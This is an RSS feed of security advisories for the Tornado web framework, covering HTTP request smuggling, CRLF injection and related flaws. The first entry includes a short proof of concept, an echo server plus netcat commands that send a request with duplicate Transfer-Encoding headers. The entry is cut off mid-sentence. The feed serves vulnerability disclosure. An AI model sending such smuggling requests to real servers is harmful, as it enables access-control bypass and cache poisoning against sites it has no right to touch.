<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Tue, 06 Oct 2026 07:42:49 +0000</lastBuildDate>
    <item>
      <title>BREW-jupyterlab-GHSA-753j-mpmx-qq6g — Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') in tornado</title>
      <link>https://cve.radiocsirt.org/vuln/brew-jupyterlab-ghsa-753j-mpmx-qq6g</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Homebrew: jupyterlab&lt;/p&gt;
&lt;p&gt;### Summary
When Tornado receives a request with two `Transfer-Encoding: chunked` headers, it ignores them both. This enables request smuggling when Tornado is deployed behind a proxy server that emits such requests. [Pound](https://en.wikipedia.org/wiki/Pound_(networking)) does this.&lt;/p&gt;
&lt;p&gt;### PoC
0. Install Tornado.
1. Start a simple Tornado server that echoes each received request&amp;#39;s body:
```bash
cat &amp;lt;&amp;lt; EOF &amp;gt; server.py
import asyncio
import tornado&lt;/p&gt;
&lt;p&gt;class MainHandler(tornado.web.RequestHandler):
    def post(self):
        self.write(self.request.body)&lt;/p&gt;
&lt;p&gt;async def main():
    tornado.web.Application([(r&amp;#34;/&amp;#34;, MainHandler)]).listen(8000)
    await asyncio.Event().wait()&lt;/p&gt;
&lt;p&gt;asyncio.run(main())
EOF
python3 server.py &amp;amp;
```
2. Send a valid chunked request:
```bash
printf &amp;#39;POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n&amp;#39; | nc localhost 8000
```
3. Observe that the response is as expected:
```
HTTP/1.1 200 OK
Server: TornadoServer/6.3.3
Content-Type: text/html; charset=UTF-8
Date: Sat, 07 Oct 2023 17:32:05 GMT
Content-Length: 1&lt;/p&gt;
&lt;p&gt;Z
```
4. Send a request with two `Transfer-Encoding: chunked` headers:
```
printf &amp;#39;POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n&amp;#39; | nc localhost 8000
```
5. Observe the strange response:
```
HTTP/1.1 200 OK
Server: TornadoServer/6.3.3
Content-Type: text/html; charset=UTF-8
Date: Sat, 07 Oct 2023 17:35:40 GMT
Content-Length: 0&lt;/p&gt;
&lt;p&gt;HTTP/1.1 400 Bad Request&lt;/p&gt;
&lt;p&gt;```
This is because Tornado bel…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Homebrew: jupyterlab&lt;/p&gt;
&lt;p&gt;### Summary
When Tornado receives a request with two `Transfer-Encoding: chunked` headers, it ignores them both. This enables request smuggling when Tornado is deployed behind a proxy server that emits such requests. [Pound](https://en.wikipedia.org/wiki/Pound_(networking)) does this.&lt;/p&gt;
&lt;p&gt;### PoC
0. Install Tornado.
1. Start a simple Tornado server that echoes each received request&amp;#39;s body:
```bash
cat &amp;lt;&amp;lt; EOF &amp;gt; server.py
import asyncio
import tornado&lt;/p&gt;
&lt;p&gt;class MainHandler(tornado.web.RequestHandler):
    def post(self):
        self.write(self.request.body)&lt;/p&gt;
&lt;p&gt;async def main():
    tornado.web.Application([(r&amp;#34;/&amp;#34;, MainHandler)]).listen(8000)
    await asyncio.Event().wait()&lt;/p&gt;
&lt;p&gt;asyncio.run(main())
EOF
python3 server.py &amp;amp;
```
2. Send a valid chunked request:
```bash
printf &amp;#39;POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n&amp;#39; | nc localhost 8000
```
3. Observe that the response is as expected:
```
HTTP/1.1 200 OK
Server: TornadoServer/6.3.3
Content-Type: text/html; charset=UTF-8
Date: Sat, 07 Oct 2023 17:32:05 GMT
Content-Length: 1&lt;/p&gt;
&lt;p&gt;Z
```
4. Send a request with two `Transfer-Encoding: chunked` headers:
```
printf &amp;#39;POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n&amp;#39; | nc localhost 8000
```
5. Observe the strange response:
```
HTTP/1.1 200 OK
Server: TornadoServer/6.3.3
Content-Type: text/html; charset=UTF-8
Date: Sat, 07 Oct 2023 17:35:40 GMT
Content-Length: 0&lt;/p&gt;
&lt;p&gt;HTTP/1.1 400 Bad Request&lt;/p&gt;
&lt;p&gt;```
This is because Tornado bel…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/brew-jupyterlab-ghsa-753j-mpmx-qq6g</guid>
    </item>
    <item>
      <title>EUVD-2026-368759</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-368759</link>
      <description>EUVD-2026-368759</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-368759</guid>
    </item>
    <item>
      <title>fkie_cve-2024-14029</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2024-14029</link>
      <description>&lt;p&gt;Tornado before 6.4.1 ignores duplicate Transfer-Encoding: chunked headers, treating requests as having no message body and parsing the chunked body as a subsequent request. Attackers can exploit this inconsistency when Tornado is deployed behind proxies to perform HTTP request smuggling, enabling access control bypass, cache poisoning, or connection desynchronization.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Tornado before 6.4.1 ignores duplicate Transfer-Encoding: chunked headers, treating requests as having no message body and parsing the chunked body as a subsequent request. Attackers can exploit this inconsistency when Tornado is deployed behind proxies to perform HTTP request smuggling, enabling access control bypass, cache poisoning, or connection desynchronization.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2024-14029</guid>
    </item>
    <item>
      <title>GHSA-hr42-gv84-2f3g</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-hr42-gv84-2f3g</link>
      <description>&lt;p&gt;Tornado before 6.4.1 ignores duplicate Transfer-Encoding: chunked headers, treating requests as having no message body and parsing the chunked body as a subsequent request. Attackers can exploit this inconsistency when Tornado is deployed behind proxies to perform HTTP request smuggling, enabling access control bypass, cache poisoning, or connection desynchronization.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Tornado before 6.4.1 ignores duplicate Transfer-Encoding: chunked headers, treating requests as having no message body and parsing the chunked body as a subsequent request. Attackers can exploit this inconsistency when Tornado is deployed behind proxies to perform HTTP request smuggling, enabling access control bypass, cache poisoning, or connection desynchronization.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-hr42-gv84-2f3g</guid>
    </item>
    <item>
      <title>OESA-2026-4034 — python-tornado security update</title>
      <link>https://cve.radiocsirt.org/vuln/oesa-2026-4034</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; openEuler:24.03-LTS-SP1: python-tornado&lt;/p&gt;
&lt;p&gt;Tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed. By using non-blocking network I/O, Tornado can scale to tens of thousands of open connections, making it ideal for long polling, WebSockets, and other applications that require a long-lived connection to each user.&#13;
&#13;
Security Fix(es):&lt;/p&gt;
&lt;p&gt;Tornado before 6.3.3 contains an HTTP request smuggling vulnerability due to improper parsing of Content-Length headers accepting non-standard characters. Attackers can send crafted HTTP requests with these characters to bypass proxy validation and smuggle requests when deployed behind certain proxies.(CVE-2023-54397)&lt;/p&gt;
&lt;p&gt;Tornado before 6.4.1 ignores duplicate Transfer-Encoding: chunked headers, treating requests as having no message body and parsing the chunked body as a subsequent request. Attackers can exploit this inconsistency when Tornado is deployed behind proxies to perform HTTP request smuggling, enabling access control bypass, cache poisoning, or connection desynchronization.(CVE-2024-14029)&lt;/p&gt;
&lt;p&gt;Tornado before 6.4.1 contains a CRLF injection vulnerability in CurlAsyncHTTPClient that fails to reject carriage return and line feed characters in request headers. Attackers can inject CRLF sequences into header values to inject arbitrary headers or construct entirely new HTTP requests.(CVE-2024-58384)&lt;/p&gt;
&lt;p&gt;Tornado before 6.5.8 contains a memory amplification vulnerability in parse_multipart_form_data that splits multipart data before validatin…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; openEuler:24.03-LTS-SP1: python-tornado&lt;/p&gt;
&lt;p&gt;Tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed. By using non-blocking network I/O, Tornado can scale to tens of thousands of open connections, making it ideal for long polling, WebSockets, and other applications that require a long-lived connection to each user.&#13;
&#13;
Security Fix(es):&lt;/p&gt;
&lt;p&gt;Tornado before 6.3.3 contains an HTTP request smuggling vulnerability due to improper parsing of Content-Length headers accepting non-standard characters. Attackers can send crafted HTTP requests with these characters to bypass proxy validation and smuggle requests when deployed behind certain proxies.(CVE-2023-54397)&lt;/p&gt;
&lt;p&gt;Tornado before 6.4.1 ignores duplicate Transfer-Encoding: chunked headers, treating requests as having no message body and parsing the chunked body as a subsequent request. Attackers can exploit this inconsistency when Tornado is deployed behind proxies to perform HTTP request smuggling, enabling access control bypass, cache poisoning, or connection desynchronization.(CVE-2024-14029)&lt;/p&gt;
&lt;p&gt;Tornado before 6.4.1 contains a CRLF injection vulnerability in CurlAsyncHTTPClient that fails to reject carriage return and line feed characters in request headers. Attackers can inject CRLF sequences into header values to inject arbitrary headers or construct entirely new HTTP requests.(CVE-2024-58384)&lt;/p&gt;
&lt;p&gt;Tornado before 6.5.8 contains a memory amplification vulnerability in parse_multipart_form_data that splits multipart data before validatin…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/oesa-2026-4034</guid>
    </item>
    <item>
      <title>UBUNTU-CVE-2024-14029</title>
      <link>https://cve.radiocsirt.org/vuln/ubuntu-cve-2024-14029</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:Pro:16.04:LTS: python-tornado, Ubuntu:Pro:18.04:LTS: python-tornado, Ubuntu:Pro:20.04:LTS: python-tornado, Ubuntu:Pro:22.04:LTS: python-tornado, Ubuntu:24.04:LTS: python-tornado, Ubuntu:26.04:LTS: python-tornado&lt;/p&gt;
&lt;p&gt;Tornado before 6.4.1 ignores duplicate Transfer-Encoding: chunked headers, treating requests as having no message body and parsing the chunked body as a subsequent request. Attackers can exploit this inconsistency when Tornado is deployed behind proxies to perform HTTP request smuggling, enabling access control bypass, cache poisoning, or connection desynchronization.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:Pro:16.04:LTS: python-tornado, Ubuntu:Pro:18.04:LTS: python-tornado, Ubuntu:Pro:20.04:LTS: python-tornado, Ubuntu:Pro:22.04:LTS: python-tornado, Ubuntu:24.04:LTS: python-tornado, Ubuntu:26.04:LTS: python-tornado&lt;/p&gt;
&lt;p&gt;Tornado before 6.4.1 ignores duplicate Transfer-Encoding: chunked headers, treating requests as having no message body and parsing the chunked body as a subsequent request. Attackers can exploit this inconsistency when Tornado is deployed behind proxies to perform HTTP request smuggling, enabling access control bypass, cache poisoning, or connection desynchronization.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ubuntu-cve-2024-14029</guid>
    </item>
  </channel>
</rss>
